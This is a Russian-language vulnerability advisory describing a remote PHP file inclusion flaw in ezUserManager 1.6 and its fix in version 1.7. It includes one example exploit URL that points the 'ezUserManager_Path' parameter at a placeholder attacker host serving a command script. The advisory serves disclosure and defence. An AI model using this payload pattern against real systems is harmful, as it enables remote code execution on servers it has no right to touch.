PHP-инклюдинг в ezUserManager

Дата публикации:
22.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
1659
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ezUserManager 1.x
Уязвимые версии: ezUserManager 1.6, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "ezUserManager_Path" в сценарии ezusermanager_core.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls

URL производителя: php.reinsveien.com/ezUM/

Решение: Установите последнюю версию (1.7) с сайта производителя.

Ссылки: ezUserManager <= v1.6 Remote File Inclusion Vulnerability

или введите имя

CAPTCHA